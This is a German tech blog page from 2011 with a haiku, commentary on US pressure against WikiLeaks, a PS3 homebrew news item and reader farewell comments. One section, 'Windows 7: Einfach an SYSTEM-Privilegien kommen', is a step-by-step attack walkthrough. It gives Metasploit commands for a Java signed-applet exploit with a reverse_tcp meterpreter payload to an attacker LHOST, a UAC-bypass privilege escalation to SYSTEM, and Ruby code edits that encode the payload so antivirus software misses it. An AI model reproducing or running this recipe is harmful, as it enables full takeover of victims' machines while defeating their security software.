HomeArtikelDownloadsForum
PCFreunde.deArtikelAllgemeinH4ckb3rts BlogH4ckb3rts Blog: Jetzt ist Schluss mit lustig!
Besucher online: 38
Hinweis
Diese Seite steht zum Verkauf.
Mehr Infos

Schnellsuche

Kategorien
Montag, 30. Mai 2011 Seite 21/22
KW 02: Knorpelfisch und Rind
H4ckb3rts Blog (Quelle: PCFreunde.de)
Ein Quell ist versiegt. Jedenfalls sprudelt er im Moment nicht. Seit 0tt0 weiß, dass er hier bei euch hochgeschätzten PCFreunden allwöchentlich als Mottogeber verheizt wird, perlen ihm seine Epiphanien viel seltener von den Lippen. In leicht schizophrener USA-vs.-WikiLeaks-Manier zensiert er sich selbst und erstarrt in Schweigen, anstatt seine Erkenntnisse in die Welt hinauszuposaunen.

Darum will ich heute – auch inspiriert durch eine noch zu benennende Künstlerin – eine weitere Montagstradition begründen, die ich immer dann zu pflegen gedenke, wenn 0tt0 sich mal wieder in Schweigen hüllt. Oder zickt. Oder nur dummes Zeug erzählt. Ich präsentiere: Das H4ckb3rt-Haiku!

Windows

Eine Sanduhr dreht

Und der Ladebalken ruckt

Rund zum Teufelskreis.
WikiLeaks: Die Schlinge zieht sich zu
WikiLeaks (Quelle: WikiLeaks)
Der Druck, den die USA auf WikiLeaks, Julian Assange und alle Unterstützer der Enthüllungsplattform ausübt, nimmt langsam beängstigende Ausmaße an. Nachdem zahlreiche US-Unternehmen die Zusammenarbeit mit WikiLeaks aufgekündigt hatten, der Seite der Geldhahn abgedreht und der Zugang zur Öffentlichkeit blockiert werden sollte und obendrein in Schweden eine Schmutzkampagne gegen Assange losgetreten wurde, kommt jetzt eine gerichtliche Verfolgung hinzu.

Ein US-Gericht fordert nämlich Twitter – und wahrscheinlich noch weitere Internetdienstleister – auf, sämtliche Daten über bekannte WikiLeaks-Unterstützer herauszugeben. Dazu gehören Informationen wie IP-Adressen, Anmeldedaten, E-Mail-Adressen, Telefonnummern und sämtliche Verbindungsdaten. Zu den Aktivisten, die auf diese Weise entblößt werden sollen, gehören neben Julian Assange unter anderem die isländische Abgeordnete Birgitta Jonsdottir, der niederländische Computerexperte Rop Gonggrijp und der US-amerikanische Hacker Jacob Appelbaum. Das Gericht wollte seinen Datenangriff ursprünglich geheim halten: Nur dank juristischer Gegenwehr von Twitter musste eine Verschwiegenheitsklausel aufgehoben werden, die eine Information der Betroffenen unterbinden sollte. Es erscheint wahrscheinlich, dass auch anderen Anbietern wie Google und Facebook ähnliche Gerichtsbeschlüsse zugestellt wurden und diese sich bisher nur nicht von dem juristischen Maulkorb freimachen konnten.

Birgitta Jonsdottir (Quelle: Wikimedia Commons)
Birgitta Jonsdottir steht schon seit längerem in Verbindung mit WikiLeaks. Sie hatte sich jedoch wegen der Sex-Vorwürfe von der Webseite und deren Sprecher Julian Assange distanziert. Auch Jacob Appelbaum ist ein alter Bekannter: Er hat bisher vor allem als Hacker auf sich aufmerksam gemacht, indem er MD5-Kollisionen erzeugte, die eine Lücke in der SSL-Verschlüsselung aufgetan haben oder RAM-Riegel auf Eis legte, um ihren Inhalt auch im ausgeschalteten Zustand auslesen zu können. Appelbaum ist allerdings auch als WikiLeaks-Unterstützer in Erscheinung getreten, indem er beispielsweise Julian Assange als Sprecher auf einer Konferenz vertrat. Dieses Engagement hat ihm erst die Aufmerksamkeit der US-Zollbehörde eingebracht, die nach einer Auslandsreise seinen Laptop und mehrere Mobiltelefone beschlagnahmte und jetzt die erwähnte Zuwendung des US-Bundesgerichtes.

Doch so unerfreulich diese Nachstellungen für Presse- und Meinungsfreiheit im Allgemeinen und die Betroffenen im Besonderen auch sind, sie stellen nur Folgen und Symptome des eigentlichen Ereignisses dar: Es scheint den US-amerikanischen Gegnern von Wikileaks zu gelingen, Privatwirtschaft und Staatsorgane zu einer einzigen Druckkulisse zu vereinen. Zu PayPal, VISA und der Bank of America, die WikiLeaks ökonomisch bedrängten, gesellt sich jetzt ein US-Gericht. Und statt die bisher schon nebulösen Vorgänge zu erhellen, geht dieses Gericht leider ebenso fragwürdig vor. Das macht es zusehends schwieriger, nicht zum Verschwörungstheoretiker zu werden.
PS3-Hack: geohot legt Homebrew-Software vor
Homebrew für die PlayStation 3 (Quelle: youTube/geohot)
Es war angekündigt und jetzt geht es los: Hausgemachte Software für die Playstation 3 ist keine Phantasie mehr. Nachdem das Team failOverflow auf dem 27C3 peinliche Lücken in der Sicherheitsarchitektur der PS3 offenbart hat und damit die Straße zum PS3-Homebrew-Channel ebnete, lässt sich jetzt auch Hackerveteran geohot nicht mehr lange bitten. Er hatte bereits vorletzte Woche den Generalschlüssel zum Signieren von PS3-Programmen veröffentlicht und legt jetzt mit einer ersten Anwendung nach. Noch handelt es sich nur ein relativ unspektakuläres Beispiel, das gerade mal einen Tropfen auf den Bildschirm zaubert, aber dies dürfte der Tropfen sein, der den Damm bricht. Die Renaissance der PS3-Linux-Cluster ist unaufhaltsam...
Kurioses: Die gesungene Finanzkrise
Kerstin Gundt - ganz ehrlich. (Quelle: YouTube/ForumDerNichtArbeit)
Selten, aber immer mal wieder stolpere ich im Weltnetz über Dinge, die mir schlicht die Sprache verschlagen. Das jüngste Ereignis dieser Art verdanke ich der Berliner Liedermacherin Kerstin Gundt. Frau Gundt betreibt eine Webseite, die ihrer Kunst in nichts nachsteht und veröffentlicht auf dieser musikalische und poetische Ergüsse politischer Art. Viel mehr kann und will ich – auch aus Gründen der Höflichkeit – gar nicht zum Gundtschen Oeuvre sagen, nur so viel sei noch gestattet: Liebe Frau Gundt, falls demnächst das Fernsehen an Sie herantritt, unterschreiben Sie nichts, was Ihnen nicht mindestens eine halbjährige Auszeit im Ausland sichert. Die könnten sie brauchen.
Windows 7: Einfach an SYSTEM-Privilegien kommen
---BEGIN TRANSMISSION, FROM: 0tt0_n0rmal0---

Das Privilege-Escalation-Script, das hier letzte Woche erwähnt wurde, hat Eingang in den Standard-Metasploit-Tree gehalten. Während das Originalskript noch nicht einwandfrei funktionierte, passt sich die zum Modul umgewandelte Variante bestens ins Metasploit-Framework ein. Zur Erinnerung: Es handelt sich um eine Methode, aus einer meterpreter-Session auf einfachem User-Level eine Session mit SYSTEM-Freigaben zu machen. Genau so etwas soll eigentlich durch die User Account Control, eins der wichtigsten Sicherheitsfeatures von Windows 7, verhindert werden. Doch dank David "Rel1k" Kennedy und Kevin Mitnick ist es so leicht wie seit Windows-XP-Tagen nicht mehr, eine Maschine komplett zu übernehmen.

Leider wird die Freude am Ausprobieren des Modules schnell dadurch getrübt, dass praktisch jede Antivirus-Software dabei Alarm schlägt. Auslöser des Alarms ist noch nicht einmal die eigentliche Privilege Escalation, sondern die sich zurückverbindende zweite meterpreter-Session im SYSTEM-Kontext. Dieser Alarm lässt sich jedoch umgehen und wie das gelingt, wird hier heute geschildert. Zunächst zeigt folgendes Beispiel den unveränderten Exploit-Vorgang anhand des üblichen BackTrack-Linux' und eines populären Java-Exploits'.

Metasploit wird aktualisiert, die Konsole wird gestartet, der entsprechende Exploit nebst Payload geladen und in Bereitschaft gelegt:
msfupdate
msfconsole
use exploit/multi/browser/java_signed_applet
set payload /windows/meterpreter/reverse_tcp
set SRVPORT 80
set URIPATH /
set LHOST 192.168.21.10
exploit
Die LHOST-IP ist natürlich an die eigenen Gegebenheiten anzupassen. Danach kann der Browser einer anderen (virtuellen) Maschine auf eben diese IP gelenkt werden, woraufhin ein Dialogfenster die Ausführung des Java-Applets bestätigt haben will. Anschließend öffnet sich auf der BackTrack-Maschine die erste meterpreter-Session. Die ist jedoch zu diesem Zeitpunkt zu ignorieren.

Stattdessen ist das UAC-Umgehungsmodul zu laden und auf die erste meterpreter-Session zu verweisen.
use post/windows/escalate/bypassuac
set LPORT 4445
set SESSION 1
exploit
Wenn die vom Modul generierte Datei auf die Opfermaschine hochgeladen wird, sollte dort das Antivirus-Programm auslösen und die weitere Kompromittierung des Systems verhindern. Um diese Falle in Zukunft umgehen zu können, muss das Ruby-Skript, das die Erzeugung der Angriffsdatei steuert, folgendermaßen umgeschrieben werden:

Die Zeile
exe = Msf::Util::EXE.to_win32pe(session.framework, raw)
ist zu entfernen und zu ersetzen durch:
if payload =~ /x64/
	enc = Msf::Util::EXE.encode_stub(session.framework, [ARCH_X86_64], raw)
	exe = Msf::Util::EXE.to_win64pe(session.framework, enc)
else
	enc = Msf::Util::EXE.encode_stub(session.framework, [ARCH_X86], raw)
	exe = Msf::Util::EXE.to_win32pe(session.framework, enc)
end
Sonst wird nichts am Skript verändert. Es empfiehlt sich allerdings, die umgeschriebene Datei unter anderem Namen, beispielsweise bypassuac_encoded.rb, abzuspeichern. Nach einem Neustart des Metasploit-Frameworks steht sie dann als Modul zur Verfügung. Nunmehr sollte kaum noch eine Antivirus-Software die Privilege Escalation bemerken. Um dies zu überprüfen, ist, abgesehen vom veränderten Modulnamen, identisch mit der oben dargestellten Vorgehensweise zu verfahren.

---END TRANSMISSION---
ZurückWeiter
© Copyright PCFreunde.de
Inhaltsverzeichnis
Kommentare
Schreib uns deine Meinung zu diesem Artikel - einfach registrieren und los!
Kommentar schreiben
 
Hollywood
05.01.2011 17:29
Rückblick 2010: Noch mehr Totalversagen das Video die Ak ist das geilste :mrgreen:
Wie der zweite sich schrottlacht !
 
geilo
11.01.2011 18:51
Nei das mit dem Golf 2oder das wo der Fussball Spieler ausrutscht uund die Treppe runterrustscht
 
BgF
18.01.2011 16:16
Ich hatte ja meine bedenken was Kinect angeht.
Dachte wieder an irgendwelches rumgehampel, wie bei dem Wii Hype und eigentlich ist es auch nix anderes.
Doch wenn ich mich an den Film Minority Report erinnere :mrgreen:

Bin gespannt auf die Zukunft der Bewegungssteuerung.
 
geilo
30.01.2011 15:16
Wenn ich mich an den Film (T)Raumschiff Enterprise denke dann wird es auch nicht gerade der Renner in der Raumfahrt
 
nikasio14
15.02.2011 01:13
Sony = Fail ;-) Ich hab mich selten so schlapp gelacht, danke Hackbert!
Geohot Hat seine Sache aber fast noch besser gemacht :twisted:

Was die Folgen von BigBangTheory angeht, ich hoffe die deutschen Folgen gibt es bald im kino. Total mein Fall und absolut zum "auf-dem-Boden-umherrollen" =)
Fast schon besser als two-and-a-half-men ...

 
nikasio14
07.03.2011 22:53
hallo jungs!
betreffend der plug-computer: Wie kann man die programmieren/einstellen? Über RemoteAccess oder habe ich den Bildschirm-Eingang irgendwie übersehen!? :oops:

Ich denke gerade ernsthaft über solch eine Lösung nach weil ich non-stop unterwegs bin und sicher nicht mein laptop und 3 Festplatten mitschleppe...

Wie funktioniert das genau oder hab ich da einen Thread schon übersehen?

thx nikasio14
 
nikasio14
14.03.2011 22:53
:lol: Grüßli Müsli zurück 8)

Wuha ich glaub ich lern mal was Neues über SSH =)
Danke für die Hilfe!

Ich bin schon auf die nächsten Grundlagen-Infos gespannt! Wie wärs mit einem kleinen Einstieg ins erste dezentrale (kabel-)Netzwerk mit TCP-Protokoll und der Grundidee des internets, die ja mehr oder weniger auf TCP/IP basiert!? (Ich hoffe ich hab das jetzt richtig formuliert...)


Lg nikasio14
 
Piperjoe
18.04.2011 21:56
Sehr Schade das Geohot aufgegeben hat. Aber auch verständlich. Nach monatelangen Gerichtsverhandlungen gegen so einen Riesenkonzern wie Sony ist das ganze sicher ermüdent.

Grüße
Piperjoe

P.s.: Also habe ich an die EFF gespendet :>
 
geilo
23.04.2011 20:12
Vor 2 Wochen hatte ich die Entscheidung PS3 mit Move scheiß und XBox 360 Slim mit Kinect scheiß hab mich für die XBox entschieden!
Aber das ist vollkommen verständlich warum er aufgegeben hat er weiß das Sony Macht hat die er nicht hat!
Sony steckt viel viel viel viel Kohle in der Entwicklung von Sicherhei Microsoft entwickelt paar Spiele mehr schon haben sie mehr Kohle beide kommen zum Ziel. Aber ich werde mich eh von Sony Produkten fernhalten meine PSP ist nach 2 Jahren genau kaputt gegangen sie hat sich nicht mehr aufgeladen Reparatur sinnlos kostet mehr als ein neues Gerät
 
Nvidia Freak
18.05.2011 13:40
Also mit dem Artikel über Windows und Linux kann ich mich nicht mit anfreunden. In meiner Schule haben wir vor einem Jahr auf von Windows auf Linux gewechselt. Das hat bisher wunderbar geklappt und auch sämtlicher Aufwand das Netztwerk zu betreiben ist im Gegansatz zu dem Betrieb mit Windows merklich geschrumpft. Es ist auch kein "tippintensiver Alptraum". Auch sind bisher Probleme wie Viren oder ähnliches weggefallen und sollte ein PC mal nicht mehr funktionieren, ist er innerhalb einer Viertelstunde neu aufgesetzt. Mit Windows habe ich sowas bisher noch nicht hinbekommen.
Die meisten Probleme die noch auftauchen, haben wir mit unseren verbliebenen Windows-Rechnern.

Nachtrag eines anderen Admins
Die Organisation des Auswärtigen Amts mit Linux wurde katastrophal geleitet - Stichwort "Eigene Distribution"
 
geilo
18.05.2011 22:37
Nun ja aber wer will nun extra Tage lang Treiber und Software für Linux suchen? Für eine Schule ist das nicht schwierig die brauchen nur Office aber bei CNC wird das schon schwieriger.
Vielleicht ist Linux besser aber wozu sollte ich wechseln wenn Windows so toll funktioniert?
 
Nvidia Freak
19.05.2011 20:50
Naja, auch eine Schule braucht mehr als nur Office. Und mit Windows hat es nicht sehr toll funktioniert
 
Venson
20.05.2011 16:15
Gott: Menschen Doof!


Hahah...


Definitiv einer der besten blog eintragungen von H4ckv3rts Ever^^...

ich sag euch wir menschen haben vieleicht probleme...
 
freches Frettchen
28.05.2011 16:29
Hackbarts Block ist für mich an jedem Wochenende immer das Highlight.
Köstliche Kommentare mit einer schönen Portion Ironie :lol: .
Weiter so...
l.G. vom Uwe :wink:
 
tho.moore
30.05.2011 21:33
Schade, das du aufhörst.

Dann ist das vlt die letzte Möglichkeit, dir (nochmal) für die vielen schönen, lustigen, verrückten aber immer lehrreichen Artikel zu danken.

Vielen Dank für Alles!

Viel Glück für deinen weiteren Weg :wink:
 
-luke-
30.05.2011 21:43
Kein Witz hem? Heut ist nicht der 1. April. Ok. Sollst wissen ich hab es genossen, die ganzen 1,5 Jahre die ich den Blog kenne. Echt schade aber. . . Viel Erfolg und bye!
 
Lasergraph
30.05.2011 22:26
Kann mich da nur anschliessen.

Finde es ebenfalls sehr Schade das du nun aufhörst. Aber wie du schon geschrieben hast. Alles hat ein Ende,(nur die Wurst hat zwei).

Vielen Dank für die vielen wirklich tollen Blogeinträge. Und viel Erfolg.
 
ATI Gott
30.05.2011 23:29
Schade, dass eines der Highlights von PCF ausgeht :(

Dein Blog war jede Woche wieder sehr gut geschrieben und unterhaltsam! Schönes Video als Abschied :D Wir werden dich alle vermissen :cry:
 
DezarPunk
31.05.2011 03:53
Auch ich kann mich nur aschließen, der Blog war über die Jahre immer mein Montags-Höhepunkt!

Good bye H4ckb3rt! :( *schnief!*

Und alles Gute für Deine Zukunft! :wink:
 
freches Frettchen
31.05.2011 07:03
Tja Hackbart,
da kann und will ich mich
Deinem Freund 0tt0 nur anschliessen.Ich stehe auch auf und gebe Dir stillschweigend die Hand.
Danke für die wunderschönen Beiträge.Ich habe sie immer sehr gerne gelesen und mich köstlich amüsiert darüber.
Dankeschön nochmals für Deine Beiträge und alles Gute für Deine Zukunft.

//Vieleicht juckt es Dich doch nochmals in den Fingern,und Du meldest Dich mal wieder hier.Würde mich sehr darüber freuen.

liebe Grüsse mit einer Träne im Knopfloch und einer Rose im Auge vom ollen Uwe :cry: :cry:
 
Alle BeiträgeKommentar schreiben
Community Login
eMail:
Passwort:
Auto-Login